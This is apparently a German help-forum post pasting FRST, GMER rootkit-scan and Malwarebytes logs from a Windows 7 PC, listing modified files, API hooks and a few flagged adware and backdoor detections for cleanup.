2013-12-17 12:12 - 2013-12-17 12:12 - 00108255 _____ C:\Users\*****\Downloads\Open_Graph_Protocol_v2.6_j25_unzipfirst.zip
2013-12-17 11:41 - 2013-12-17 12:07 - 00000000 ____D C:\Users\*****\Desktop\mp3

==================== One Month Modified Files and Folders =======

2014-01-15 08:44 - 2014-01-15 08:44 - 00000000 ____D C:\FRST
2014-01-15 08:44 - 2014-01-15 08:43 - 02076160 _____ (Farbar) C:\Users\*****\Downloads\FRST64.exe
2014-01-15 08:42 - 2014-01-15 08:42 - 00000000 _____ C:\Users\*****\defogger_reenable
2014-01-15 08:42 - 2010-12-11 20:34 - 00000000 ____D C:\Users\*****
2014-01-15 08:41 - 2014-01-15 08:41 - 00050477 _____ C:\Users\*****\Downloads\Defogger.exe
2014-01-15 08:39 - 2010-12-11 20:50 - 00001110 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-01-15 07:43 - 2009-07-14 05:45 - 00009920 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-01-15 07:43 - 2009-07-14 05:45 - 00009920 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-01-15 07:39 - 2010-07-28 14:21 - 01592860 _____ C:\Windows\WindowsUpdate.log
2014-01-15 07:36 - 2011-07-14 17:04 - 00000000 ___RD C:\Users\*****\Dropbox
2014-01-15 07:36 - 2011-07-14 17:03 - 00000000 ____D C:\Users\*****\AppData\Roaming\Dropbox
2014-01-15 07:35 - 2010-12-11 20:50 - 00001106 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-01-15 07:34 - 2010-07-28 14:27 - 00000000 ____D C:\ProgramData\NVIDIA
2014-01-15 07:34 - 2009-07-14 06:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2014-01-15 07:34 - 2009-07-14 05:51 - 00137813 _____ C:\Windows\setupact.log
2014-01-14 19:07 - 2010-07-26 14:08 - 00700380 _____ C:\Windows\system32\perfh007.dat
2014-01-14 19:07 - 2010-07-26 14:08 - 00149176 _____ C:\Windows\system32\perfc007.dat
2014-01-14 19:07 - 2009-07-14 06:13 - 01622100 _____ C:\Windows\system32\PerfStringBackup.INI
2014-01-14 18:58 - 2010-12-20 12:28 - 00000000 ____D C:\Users\*****\AppData\Roaming\gSyncit
2014-01-14 18:54 - 2014-01-14 18:26 - 625348608 _____ C:\Users\*****\Downloads\rescue-system.iso
2014-01-14 18:50 - 2014-01-14 18:40 - 121822819 _____ C:\Users\*****\Downloads\avg_arl_ffi_all_120_130801a6481.rar
2014-01-14 18:44 - 2014-01-14 18:44 - 00002952 _____ C:\Users\*****\Downloads\access_log_2013-11-12.gz
2014-01-14 18:42 - 2014-01-14 18:42 - 00002316 _____ C:\Users\*****\Downloads\access_log_2014-01-05.gz
2014-01-14 18:38 - 2014-01-14 18:15 - 00043520 ___SH C:\Users\*****\AppData\Roaming\Thumbs.db
2014-01-14 18:35 - 2014-01-14 18:28 - 112001024 _____ C:\Users\*****\Downloads\avg_arl_cdi_all_120_130801a6481.iso
2014-01-14 18:16 - 2010-12-18 20:23 - 00000000 ____D C:\Users\*****\AppData\Roaming\FileZilla
2014-01-14 18:09 - 2014-01-14 18:09 - 05063616 _____ (PortableApps.com) C:\Users\*****\Downloads\FileZillaPortable_3.7.3.paf.exe
2014-01-14 17:08 - 2011-01-06 16:46 - 00269936 _____ C:\Users\Admin\AppData\Local\GDIPFONTCACHEV1.DAT
2014-01-14 15:32 - 2013-10-19 19:14 - 00000557 _____ C:\Users\*****\Desktop\moooooovie.txt
2014-01-14 15:11 - 2014-01-14 15:11 - 00378099 _____ C:\Users\*****\Downloads\10_246_16_68.sql
2014-01-14 11:04 - 2014-01-14 11:03 - 00000000 ____D C:\Users\*****\Desktop\templates_c
2014-01-13 16:38 - 2013-12-04 17:50 - 00000053 _____ C:\Users\*****\Downloads\google63a169ac443c121d.html
2014-01-13 16:31 - 2014-01-13 16:31 - 01790152 _____ C:\Users\*****\Downloads\com_phocagallery_v3.2.6(1).zip
2014-01-13 14:04 - 2014-01-13 14:04 - 00000282 _____ C:\Users\*****\Desktop\10 Schritte zum erfolgreichen Facebook-Gewinnspiel Fanpage Karma Blog.URL
2014-01-13 06:48 - 2009-07-14 05:45 - 01348600 _____ C:\Windows\system32\FNTCACHE.DAT
2014-01-12 17:57 - 2013-11-29 20:15 - 00002356 _____ C:\Users\*****\Desktop\kauuuuuuf.txt
2014-01-12 16:53 - 2014-01-12 16:53 - 00000217 _____ C:\Users\*****\Desktop\The Scale of the Universe 2 — Other Languages.URL
2014-01-12 10:56 - 2014-01-12 10:56 - 00028736 _____ C:\Users\*****\Downloads\12_01_2014_WebFTP.zip
2014-01-12 09:24 - 2010-12-11 20:34 - 00269936 _____ C:\Users\*****\AppData\Local\GDIPFONTCACHEV1.DAT
2014-01-12 09:20 - 2014-01-12 09:20 - 00119546 _____ C:\Users\*****\Downloads\droid-serif.zip
2014-01-12 09:20 - 2014-01-12 09:20 - 00079700 _____ C:\Users\*****\Downloads\droid-sans-mono.zip
2014-01-12 09:20 - 2014-01-12 09:20 - 00011194 _____ C:\Users\*****\Downloads\Droid.zip
2014-01-12 09:19 - 2014-01-12 09:19 - 00211015 _____ C:\Users\*****\Downloads\Droid-Sans.zip
2014-01-11 20:33 - 2014-01-11 20:32 - 00002057 _____ C:\Users\*****\Desktop\configuration.php
2014-01-10 16:38 - 2009-07-14 04:20 - 00000000 ____D C:\Windows\system32\NDF
2014-01-10 11:14 - 2009-07-14 03:34 - 00000531 _____ C:\Windows\win.ini
2014-01-10 10:58 - 2014-01-10 10:58 - 00036115 _____ C:\Users\*****\Downloads\access-2014010821-2014011002.log.gz
2014-01-09 12:03 - 2014-01-09 11:59 - 126234924 _____ C:\Users\*****\Downloads\Vorübung zu Swan Dive Prep.wmv
2014-01-09 07:10 - 2012-02-07 11:46 - 00001506 _____ C:\Windows\wininit.ini
2014-01-09 07:10 - 2011-07-14 17:04 - 00001025 _____ C:\Users\*****\Desktop\Dropbox.lnk
2014-01-09 07:10 - 2011-07-14 17:03 - 00000000 ____D C:\Users\*****\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dropbox
2014-01-09 07:10 - 2010-12-11 20:35 - 00000000 ___RD C:\Users\*****\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
2014-01-09 06:39 - 2009-11-18 23:09 - 00811302 _____ C:\Windows\PFRO.log
2014-01-08 11:52 - 2014-01-08 11:52 - 00002371 _____ C:\Users\*****\Downloads\address.zip
2014-01-08 11:15 - 2014-01-08 11:15 - 00000000 ____D C:\Program Files (x86)\FlippingBook
2014-01-08 11:15 - 2014-01-08 11:13 - 00000000 __HDC C:\ProgramData\{0C886C27-6204-4A3D-8348-A42A59BC7205}
2014-01-08 11:15 - 2013-12-09 14:27 - 00001153 _____ C:\Users\Public\Desktop\FlippingBook Publisher Professional.lnk
2014-01-08 11:14 - 2013-12-09 14:25 - 00000000 __HDC C:\ProgramData\{CA331EC7-0458-49DF-8B26-9E171A9EAE0D}
2014-01-08 11:13 - 2014-01-08 11:13 - 00000000 ____D C:\Users\*****\AppData\Local\III
2014-01-07 19:50 - 2014-01-07 19:50 - 00000233 _____ C:\Users\*****\Desktop\Fly Birds Hd Legendary Birds Legendary Pokemon. Colourful Pheasant Birds Wallpapers. Fly Birds Hd ~ Photoinpixel.URL
2014-01-05 16:21 - 2011-01-03 16:37 - 00000000 ____D C:\Users\*****\AppData\Roaming\Azureus
2014-01-04 19:06 - 2014-01-04 19:06 - 00003714 _____ C:\Users\*****\Desktop\pointclouds - Verknüpfung.lnk
2014-01-04 16:21 - 2013-12-12 14:55 - 00000000 ____D C:\Users\*****\Desktop\löschen_____
2014-01-02 11:26 - 2014-01-02 11:26 - 00000053 _____ C:\Users\*****\Desktop\google63a169ac443c121d.html
2013-12-31 14:08 - 2013-12-31 14:08 - 00000225 _____ C:\Users\*****\Desktop\macklemore album.URL
2013-12-30 20:16 - 2013-12-30 20:11 - 176752984 _____ (VMware, Inc.                                                   ) C:\Users\*****\Downloads\VMware-converter-en-5.5.0-1362012.exe
2013-12-30 08:58 - 2013-12-30 08:54 - 98508144 _____ (VMware, Inc.) C:\Users\*****\Downloads\VMware-player-6.0.1-1379776.exe
2013-12-30 08:35 - 2013-12-30 08:35 - 00409141 _____ C:\Users\*****\Downloads\torbutton146-current.zip
2013-12-29 12:29 - 2013-12-29 12:29 - 00000000 ____D C:\Users\*****\AppData\Roaming\Stellarium
2013-12-29 12:29 - 2013-12-29 12:29 - 00000000 ____D C:\Users\*****\AppData\Local\stellarium
2013-12-29 12:28 - 2013-12-29 12:28 - 00001724 _____ C:\Users\Public\Desktop\Stellarium.lnk
2013-12-29 12:28 - 2013-12-29 12:28 - 00000000 ____D C:\Program Files\Stellarium
2013-12-29 11:24 - 2013-12-29 11:22 - 81699167 _____ (Stellarium team                                             ) C:\Users\*****\Downloads\stellarium-0.12.4-win64.exe
2013-12-28 16:39 - 2013-09-01 18:06 - 00000000 ____D C:\Users\Admin\Desktop\test
2013-12-28 16:39 - 2010-12-23 11:42 - 00000000 ____D C:\Users\Admin\AppData\Roaming\Mozilla
2013-12-28 16:36 - 2010-12-23 11:42 - 00000000 ____D C:\Users\Admin\AppData\Local\Mozilla
2013-12-28 11:57 - 2013-12-28 11:57 - 00000000 ____H C:\Windows\system32\Drivers\Msft_Kernel_ew_juextctrl_01007.Wdf
2013-12-28 11:57 - 2013-12-28 11:57 - 00000000 ____H C:\Windows\system32\Drivers\Msft_Kernel_ew_jucdcacm_01007.Wdf
2013-12-28 11:57 - 2013-12-28 11:57 - 00000000 ____D C:\Users\*****\AppData\Roaming\Sierra Wireless
2013-12-28 11:57 - 2013-12-28 11:56 - 00000000 ____D C:\ProgramData\mquadr.at
2013-12-28 11:57 - 2013-12-28 11:53 - 00000000 ____D C:\ProgramData\DatacardService
2013-12-28 11:56 - 2013-12-28 11:56 - 00000000 ____H C:\Windows\system32\Drivers\Msft_Kernel_ew_jubusenum_01007.Wdf
2013-12-28 11:56 - 2013-12-28 11:56 - 00000000 ____D C:\Users\*****\AppData\Local\mquadr.at
2013-12-28 11:55 - 2013-12-28 11:55 - 00001163 _____ C:\Users\Public\Desktop\3InternetManager.lnk
2013-12-28 11:55 - 2013-12-28 11:55 - 00000000 __HDC C:\ProgramData\{A48B2592-413B-41AB-8710-5543CB7481EC}
2013-12-28 11:55 - 2013-12-28 11:55 - 00000000 ____D C:\ProgramData\H3G
2013-12-28 11:55 - 2013-12-28 11:55 - 00000000 ____D C:\Program Files (x86)\3InternetManager
2013-12-26 18:07 - 2013-09-26 18:33 - 00000000 ____D C:\Users\*****\Desktop\Stadtkrug Dropbox Lager brennen
2013-12-23 08:36 - 2013-12-23 08:35 - 14335560 _____ C:\Users\*****\Downloads\flags.zip
2013-12-22 12:18 - 2013-12-08 11:17 - 00001094 _____ C:\Users\Public\Desktop\TeamViewer 9.lnk
2013-12-19 11:41 - 2009-11-18 22:56 - 00000000 ____D C:\Program Files (x86)\Google
2013-12-17 20:00 - 2010-12-11 20:47 - 00000000 ____D C:\Users\*****\AppData\Roaming\Adobe
2013-12-17 12:21 - 2013-12-17 12:17 - 103312806 _____ C:\Users\*****\Downloads\d012f60a.sql
2013-12-17 12:12 - 2013-12-17 12:12 - 00108255 _____ C:\Users\*****\Downloads\Open_Graph_Protocol_v2.6_j25_unzipfirst.zip
2013-12-17 12:07 - 2013-12-17 11:41 - 00000000 ____D C:\Users\*****\Desktop\mp3
2013-12-16 09:17 - 2010-12-25 15:48 - 00001998 ____H C:\Users\*****\Documents\Default.rdp

Some content of TEMP:
====================
C:\Users\*****\AppData\Local\Temp\7.2.20.2-EasyShrx.Dll
C:\Users\*****\AppData\Local\Temp\autorun.dll
C:\Users\*****\AppData\Local\Temp\fox.dll
C:\Users\*****\AppData\Local\Temp\i4jdel0.exe
C:\Users\*****\AppData\Local\Temp\icu34.dll
C:\Users\*****\AppData\Local\Temp\icudt34.dll
C:\Users\*****\AppData\Local\Temp\InstallFlashPlayer.exe
C:\Users\*****\AppData\Local\Temp\jre-6u24-windows-i586-iftw-rv.exe
C:\Users\*****\AppData\Local\Temp\jre-6u26-windows-i586-iftw-rv.exe
C:\Users\*****\AppData\Local\Temp\jre-6u31-windows-i586-iftw-rv.exe
C:\Users\*****\AppData\Local\Temp\jre-6u33-windows-i586-iftw.exe
C:\Users\*****\AppData\Local\Temp\jre-6u35-windows-i586-iftw.exe
C:\Users\*****\AppData\Local\Temp\jre-7u17-windows-i586-iftw.exe
C:\Users\*****\AppData\Local\Temp\jre-7u21-windows-i586-iftw.exe
C:\Users\*****\AppData\Local\Temp\jre-7u25-windows-i586-iftw.exe
C:\Users\*****\AppData\Local\Temp\jre-7u45-windows-i586-iftw.exe
C:\Users\*****\AppData\Local\Temp\mgxfonts.exe
C:\Users\*****\AppData\Local\Temp\MgxVistaTools.dll
C:\Users\*****\AppData\Local\Temp\msvcp71.dll
C:\Users\*****\AppData\Local\Temp\msvcr71.dll
C:\Users\*****\AppData\Local\Temp\TrueImageInstallMenu_standard.exe
C:\Users\*****\AppData\Local\Temp\ufkdfhxo.dll
C:\Users\*****\AppData\Local\Temp\xmlUpdater.exe
C:\Users\*****\AppData\Local\Temp\_is5467.exe
C:\Users\*****\AppData\Local\Temp\_is8325.exe
C:\Users\*****\AppData\Local\Temp\~convert1847027883366102978.exe
C:\Users\*****\AppData\Local\Temp\~convert2352740266388634011.exe
C:\Users\*****\AppData\Local\Temp\~convert2379864614059401350.exe
C:\Users\*****\AppData\Local\Temp\~convert3333224244493361257.exe
C:\Users\*****\AppData\Local\Temp\~convert3538011537334474619.exe
C:\Users\*****\AppData\Local\Temp\~convert3758073310861530453.exe
C:\Users\*****\AppData\Local\Temp\~convert4662644507391680170.exe
C:\Users\*****\AppData\Local\Temp\~convert5385746307805284974.exe
C:\Users\*****\AppData\Local\Temp\~convert5447643698699501366.exe
C:\Users\*****\AppData\Local\Temp\~convert6248421720152768299.exe
C:\Users\*****\AppData\Local\Temp\~convert7003483147854060770.exe
C:\Users\*****\AppData\Local\Temp\~convert7495889309273498126.exe
C:\Users\*****\AppData\Local\Temp\~convert8100649724065807693.exe
C:\Users\*****\AppData\Local\Temp\~convert8170032136072084689.exe
C:\Users\*****\AppData\Local\Temp\~convert818302282860499790.exe
C:\Users\*****\AppData\Local\Temp\~convert8447076207564456903.exe
C:\Users\*****\AppData\Local\Temp\~convert8627151247518695499.exe
C:\Users\*****\AppData\Local\Temp\~convert8691066825310743538.exe
C:\Users\*****\AppData\Local\Temp\~convert901516844038934599.exe


==================== Bamital & volsnap Check =================

C:\Windows\System32\winlogon.exe => MD5 is legit
C:\Windows\System32\wininit.exe => MD5 is legit
C:\Windows\SysWOW64\wininit.exe => MD5 is legit
C:\Windows\explorer.exe => MD5 is legit
C:\Windows\SysWOW64\explorer.exe => MD5 is legit
C:\Windows\System32\svchost.exe => MD5 is legit
C:\Windows\SysWOW64\svchost.exe => MD5 is legit
C:\Windows\System32\services.exe => MD5 is legit
C:\Windows\System32\User32.dll => MD5 is legit
C:\Windows\SysWOW64\User32.dll => MD5 is legit
C:\Windows\System32\userinit.exe => MD5 is legit
C:\Windows\SysWOW64\userinit.exe => MD5 is legit
C:\Windows\System32\rpcss.dll => MD5 is legit
C:\Windows\System32\Drivers\volsnap.sys => MD5 is legit


LastRegBack: 2014-01-09 07:35

==================== End Of Log ============================
Gmer.log
Code:
GMER 2.1.19163 - hxxp://www.gmer.net
Rootkit scan 2014-01-15 08:59:45
Windows 6.1.7601 Service Pack 1 x64 \Device\Harddisk0\DR0 -> \Device\Ide\IAAStorageDevice-1 ST310005 rev.CC44 931,51GB
Running: gmer_2.1.19163.exe; Driver: C:\Users\*****\AppData\Local\Temp\kwdirpoc.sys


---- Kernel code sections - GMER 2.1 ----

INITKDBG  C:\Windows\system32\ntoskrnl.exe!ExDeleteNPagedLookasideList + 528  fffff80003801000 45 bytes [00, 00, 16, 02, 4E, 74, 66, ...]
INITKDBG  C:\Windows\system32\ntoskrnl.exe!ExDeleteNPagedLookasideList + 575  fffff8000380102f 10 bytes [00, 01, 00, 06, 00, 00, 00, ...]

---- User code sections - GMER 2.1 ----

.text     C:\Progra~2\Adobe\Adobe Version Cue CS2\bin\VersionCueCS2.exe[2812] C:\Windows\syswow64\msvcrt.dll!free  0000000076699894 5 bytes JMP 000000010a90d2d0
.text     C:\Progra~2\Adobe\Adobe Version Cue CS2\bin\VersionCueCS2.exe[2812] C:\Windows\syswow64\msvcrt.dll!malloc  0000000076699cee 5 bytes JMP 000000010a90d230
.text     C:\Progra~2\Adobe\Adobe Version Cue CS2\bin\VersionCueCS2.exe[2812] C:\Windows\syswow64\msvcrt.dll!??3@YAXPAX@Z  000000007669b0b9 5 bytes JMP 000000010a90d2d0
.text     C:\Progra~2\Adobe\Adobe Version Cue CS2\bin\VersionCueCS2.exe[2812] C:\Windows\syswow64\msvcrt.dll!??2@YAPAXI@Z  000000007669b0c9 5 bytes JMP 000000010a90d480
.text     C:\Progra~2\Adobe\Adobe Version Cue CS2\bin\VersionCueCS2.exe[2812] C:\Windows\syswow64\msvcrt.dll!realloc  000000007669b10d 5 bytes JMP 000000010a90d2b0
.text     C:\Progra~2\Adobe\Adobe Version Cue CS2\bin\VersionCueCS2.exe[2812] C:\Windows\syswow64\msvcrt.dll!calloc  000000007669c456 5 bytes JMP 000000010a90d270
.text     C:\Progra~2\Adobe\Adobe Version Cue CS2\bin\VersionCueCS2.exe[2812] C:\Windows\syswow64\msvcrt.dll!_msize  000000007669f43b 5 bytes JMP 000000010a90d2e0
.text     C:\Progra~2\Adobe\Adobe Version Cue CS2\bin\VersionCueCS2.exe[2812] C:\Windows\syswow64\msvcrt.dll!_aligned_free  00000000766b5942 5 bytes JMP 000000010a90d2d0
.text     C:\Progra~2\Adobe\Adobe Version Cue CS2\bin\VersionCueCS2.exe[2812] C:\Windows\syswow64\msvcrt.dll!_aligned_malloc  00000000766c028d 5 bytes JMP 000000010a90d3c0
.text     C:\Progra~2\Adobe\Adobe Version Cue CS2\bin\VersionCueCS2.exe[2812] C:\Windows\syswow64\msvcrt.dll!_aligned_offset_malloc  00000000766c02a9 5 bytes JMP 000000010a90d3e0
.text     C:\Progra~2\Adobe\Adobe Version Cue CS2\bin\VersionCueCS2.exe[2812] C:\Windows\syswow64\msvcrt.dll!?set_new_handler@@YAP6AXXZP6AXXZ@Z                                                                                           00000000766ebfd1 5 bytes JMP 000000010a90d500
.text     C:\Progra~2\Adobe\Adobe Version Cue CS2\bin\VersionCueCS2.exe[2812] C:\Windows\syswow64\msvcrt.dll!_aligned_offset_realloc                                                                                                      00000000766ebfe1 5 bytes JMP 000000010a90d420
.text     C:\Progra~2\Adobe\Adobe Version Cue CS2\bin\VersionCueCS2.exe[2812] C:\Windows\syswow64\msvcrt.dll!_aligned_realloc                                                                                                             00000000766ec16b 5 bytes JMP 000000010a90d400
.text     C:\Progra~2\Adobe\Adobe Version Cue CS2\bin\VersionCueCS2.exe[2812] C:\Windows\syswow64\msvcrt.dll!_expand                                                                                                                      00000000766ec18a 5 bytes JMP 000000010a90d3a0
.text     C:\Progra~2\Adobe\Adobe Version Cue CS2\bin\VersionCueCS2.exe[2812] C:\Windows\syswow64\msvcrt.dll!_heapadd                                                                                                                     00000000766edd03 5 bytes JMP 000000010a90d550
.text     C:\Progra~2\Adobe\Adobe Version Cue CS2\bin\VersionCueCS2.exe[2812] C:\Windows\syswow64\msvcrt.dll!_heapchk                                                                                                                     00000000766edd17 5 bytes JMP 000000010a90d560
.text     C:\Progra~2\Adobe\Adobe Version Cue CS2\bin\VersionCueCS2.exe[2812] C:\Windows\syswow64\msvcrt.dll!_heapset + 1                                                                                                                 00000000766ede16 4 bytes {JMP 0xffffffff9421f76b}
.text     C:\Progra~2\Adobe\Adobe Version Cue CS2\bin\VersionCueCS2.exe[2812] C:\Windows\syswow64\msvcrt.dll!_heapmin                                                                                                                     00000000766ede1f 5 bytes JMP 000000010a90d650
.text     C:\Progra~2\Adobe\Adobe Version Cue CS2\bin\VersionCueCS2.exe[2812] C:\Windows\syswow64\msvcrt.dll!_heapused                                                                                                                    00000000766edf05 5 bytes JMP 000000010a90d620
.text     C:\Progra~2\Adobe\Adobe Version Cue CS2\bin\VersionCueCS2.exe[2812] C:\Windows\syswow64\msvcrt.dll!_heapwalk                                                                                                                    00000000766edf18 5 bytes JMP 000000010a90d590
.text     C:\Windows\SysWOW64\dgdersvc.exe[3012] C:\Windows\syswow64\PSAPI.DLL!GetModuleInformation + 69                                                                                                                                  0000000076cd1465 2 bytes [CD, 76]
.text     C:\Windows\SysWOW64\dgdersvc.exe[3012] C:\Windows\syswow64\PSAPI.DLL!GetModuleInformation + 155                                                                                                                                 0000000076cd14bb 2 bytes [CD, 76]
.text     ...                                                                                                                                                                                                                             * 2
.text     C:\Program Files (x86)\Acer\Hotkey Utility\HotkeyUtility.exe[3720] C:\Windows\syswow64\PSAPI.DLL!GetModuleInformation + 69                                                                                                      0000000076cd1465 2 bytes [CD, 76]
.text     C:\Program Files (x86)\Acer\Hotkey Utility\HotkeyUtility.exe[3720] C:\Windows\syswow64\PSAPI.DLL!GetModuleInformation + 155                                                                                                     0000000076cd14bb 2 bytes [CD, 76]
.text     ...                                                                                                                                                                                                                             * 2
.text     C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\IScheduleSvc.exe[4996] C:\Windows\syswow64\PSAPI.DLL!GetModuleInformation + 69                                                                                   0000000076cd1465 2 bytes [CD, 76]
.text     C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\IScheduleSvc.exe[4996] C:\Windows\syswow64\PSAPI.DLL!GetModuleInformation + 155                                                                                  0000000076cd14bb 2 bytes [CD, 76]
.text     ...                                                                                                                                                                                                                             * 2
.text     C:\Program Files (x86)\Audible\Bin\AudibleDownloadHelper.exe[5092] C:\Windows\syswow64\kernel32.dll!FindResourceW                                                                                                               0000000076e65911 5 bytes JMP 0000000100440980
.text     C:\Program Files (x86)\Audible\Bin\AudibleDownloadHelper.exe[5092] C:\Windows\syswow64\kernel32.dll!FindResourceA                                                                                                               0000000076e7e953 5 bytes JMP 0000000100440930
.text     C:\Program Files (x86)\Audible\Bin\AudibleDownloadHelper.exe[5092] C:\Windows\syswow64\user32.DLL!LoadStringW                                                                                                                   0000000076cf8eb9 5 bytes JMP 0000000100440fd0
.text     C:\Program Files (x86)\Audible\Bin\AudibleDownloadHelper.exe[5092] C:\Windows\syswow64\user32.DLL!LoadStringA                                                                                                                   0000000076cfdb21 5 bytes JMP 0000000100441110
.text     C:\Program Files (x86)\Audible\Bin\AudibleDownloadHelper.exe[5092] C:\Windows\syswow64\user32.DLL!LoadMenuW                                                                                                                     0000000076d04391 5 bytes JMP 0000000100440b40
.text     C:\Program Files (x86)\Audible\Bin\AudibleDownloadHelper.exe[5092] C:\Windows\syswow64\user32.DLL!LoadMenuA                                                                                                                     0000000076d14eef 5 bytes JMP 0000000100440ad0
.text     C:\Program Files (x86)\Audible\Bin\AudibleDownloadHelper.exe[5092] C:\Windows\syswow64\user32.DLL!CreateDialogParamA                                                                                                            0000000076d15246 5 bytes JMP 00000001004409d0
.text     C:\Program Files (x86)\Audible\Bin\AudibleDownloadHelper.exe[5092] C:\Windows\syswow64\user32.DLL!CreateDialogParamW                                                                                                            0000000076d210dc 5 bytes JMP 0000000100440a50
.text     C:\Program Files (x86)\Audible\Bin\AudibleDownloadHelper.exe[5092] C:\Windows\syswow64\PSAPI.DLL!GetModuleInformation + 69                                                                                                      0000000076cd1465 2 bytes [CD, 76]
.text     C:\Program Files (x86)\Audible\Bin\AudibleDownloadHelper.exe[5092] C:\Windows\syswow64\PSAPI.DLL!GetModuleInformation + 155                                                                                                     0000000076cd14bb 2 bytes [CD, 76]
.text     ...                                                                                                                                                                                                                             * 2
.text     C:\Users\*****\AppData\Roaming\Dropbox\bin\Dropbox.exe[4756] C:\Windows\syswow64\Psapi.dll!GetModuleInformation + 69                                                                                                           0000000076cd1465 2 bytes [CD, 76]
.text     C:\Users\*****\AppData\Roaming\Dropbox\bin\Dropbox.exe[4756] C:\Windows\syswow64\Psapi.dll!GetModuleInformation + 155                                                                                                          0000000076cd14bb 2 bytes [CD, 76]
.text     ...                                                                                                                                                                                                                             * 2
.text     C:\Program Files (x86)\Microsoft LifeCam\LifeTray.exe[6468] C:\Windows\SysWOW64\d3d8thk.dll!OsThunkDdWaitForVerticalBlank + 195                                                                                                 0000000071121b41 2 bytes [12, 71]
.text     C:\Program Files (x86)\Microsoft LifeCam\LifeTray.exe[6468] C:\Windows\SysWOW64\d3d8thk.dll!OsThunkDdWaitForVerticalBlank + 362                                                                                                 0000000071121be8 2 bytes [12, 71]
.text     C:\Program Files (x86)\Microsoft LifeCam\LifeTray.exe[6468] C:\Windows\SysWOW64\d3d8thk.dll!OsThunkDdWaitForVerticalBlank + 418                                                                                                 0000000071121c20 2 bytes [12, 71]
.text     C:\Program Files (x86)\Microsoft LifeCam\LifeTray.exe[6468] C:\Windows\SysWOW64\d3d8thk.dll!OsThunkDdWaitForVerticalBlank + 596                                                                                                 0000000071121cd2 2 bytes [12, 71]
.text     C:\Program Files (x86)\Microsoft LifeCam\LifeTray.exe[6468] C:\Windows\SysWOW64\d3d8thk.dll!OsThunkDdWaitForVerticalBlank + 628                                                                                                 0000000071121cf2 2 bytes [12, 71]
.text     C:\Program Files (x86)\Microsoft LifeCam\LifeEnC2.exe[7172] C:\Windows\SysWOW64\d3d8thk.dll!OsThunkDdWaitForVerticalBlank + 195                                                                                                 0000000071121b41 2 bytes [12, 71]
.text     C:\Program Files (x86)\Microsoft LifeCam\LifeEnC2.exe[7172] C:\Windows\SysWOW64\d3d8thk.dll!OsThunkDdWaitForVerticalBlank + 362                                                                                                 0000000071121be8 2 bytes [12, 71]
.text     C:\Program Files (x86)\Microsoft LifeCam\LifeEnC2.exe[7172] C:\Windows\SysWOW64\d3d8thk.dll!OsThunkDdWaitForVerticalBlank + 418                                                                                                 0000000071121c20 2 bytes [12, 71]
.text     C:\Program Files (x86)\Microsoft LifeCam\LifeEnC2.exe[7172] C:\Windows\SysWOW64\d3d8thk.dll!OsThunkDdWaitForVerticalBlank + 596                                                                                                 0000000071121cd2 2 bytes [12, 71]
.text     C:\Program Files (x86)\Microsoft LifeCam\LifeEnC2.exe[7172] C:\Windows\SysWOW64\d3d8thk.dll!OsThunkDdWaitForVerticalBlank + 628                                                                                                 0000000071121cf2 2 bytes [12, 71]

---- Registry - GMER 2.1 ----

Reg       HKCU\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Persisted@C:\Users\*****\Desktop\acer-istallation-201012\Acronis\xa0True\xa0Image\xa0Home 11.0 Kauf hhhhh BU Daten\Acronis\Setup.exe  1

---- EOF - GMER 2.1 ----
         
MBAM-Quickscan-log-2014-01-15 (09-20-02).txt
Code:
ATTFilter
Malwarebytes Anti-Malware 1.75.0.1300
www.malwarebytes.org

Datenbank Version: v2014.01.15.02

Windows 7 Service Pack 1 x64 NTFS
Internet Explorer 11.0.9600.16476
***** :: *****-PC [Administrator]

15.01.2014 09:06:41
MBAM-Quickscan-log-2014-01-15 (09-20-02).txt

Art des Suchlaufs: Quick-Scan
Aktivierte Suchlaufeinstellungen: Speicher | Autostart | Registrierung | Dateisystem | Heuristiks/Extra | HeuristiKs/Shuriken | PUP | PUM
Deaktivierte Suchlaufeinstellungen: P2P
Durchsuchte Objekte: 310708
Laufzeit: 9 Minute(n), 8 Sekunde(n)

Infizierte Speicherprozesse: 0
(Keine bösartigen Objekte gefunden)

Infizierte Speichermodule: 0
(Keine bösartigen Objekte gefunden)

Infizierte Registrierungsschlüssel: 2
HKCU\Software\InstallCore\1I1T1Q1S (PUP.Optional.InstallCore.A) -> Keine Aktion durchgeführt.
HKCU\SOFTWARE\INSTALLCORE (PUP.Optional.InstallCore.A) -> Keine Aktion durchgeführt.

Infizierte Registrierungswerte: 1
HKCU\Software\InstallCore|tb (PUP.Optional.InstallCore.A) -> Daten: 1W1G1U1K1O1H -> Keine Aktion durchgeführt.

Infizierte Dateiobjekte der Registrierung: 0
(Keine bösartigen Objekte gefunden)

Infizierte Verzeichnisse: 0
(Keine bösartigen Objekte gefunden)

Infizierte Dateien: 4
C:\$Recycle.Bin\S-1-5-21-1797653687-739084669-777346648-1001\$ROMGUCE.exe (PUP.Optional.RegCleanerPro) -> Keine Aktion durchgeführt.
C:\$Recycle.Bin\S-1-5-21-1797653687-739084669-777346648-1001\$RWBRD16.zip (Backdoor.Agent.WRRGen) -> Keine Aktion durchgeführt.
C:\Users\*****\AppData\Local\Temp\4wSV1AXm.exe.part (PUP.Optional.Somoto) -> Keine Aktion durchgeführt.
C:\Users\*****\AppData\Local\Temp\JeCbx_5v.exe.part (PUP.Optional.SweetIM) -> Keine Aktion durchgeführt.

(Ende)
         

MBAM-Quickscan-log-2014-01-15 (09-20-02) - entferne Auswahl gewählt.txt
Code:
ATTFilter
Malwarebytes Anti-Malware 1.75.0.1300
www.malwarebytes.org

Datenbank Version: v2014.01.15.02

Windows 7 Service Pack 1 x64 NTFS
Internet Explorer 11.0.9600.16476
***** :: *****-PC [Administrator]

15.01.2014 09:06:41
mbam-log-2014-01-15 (09-06-41).txt

Art des Suchlaufs: Quick-Scan
Aktivierte Suchlaufeinstellungen: Speicher | Autostart | Registrierung | Dateisystem | Heuristiks/Extra | HeuristiKs/Shuriken | PUP | PUM
Deaktivierte Suchlaufeinstellungen: P2P
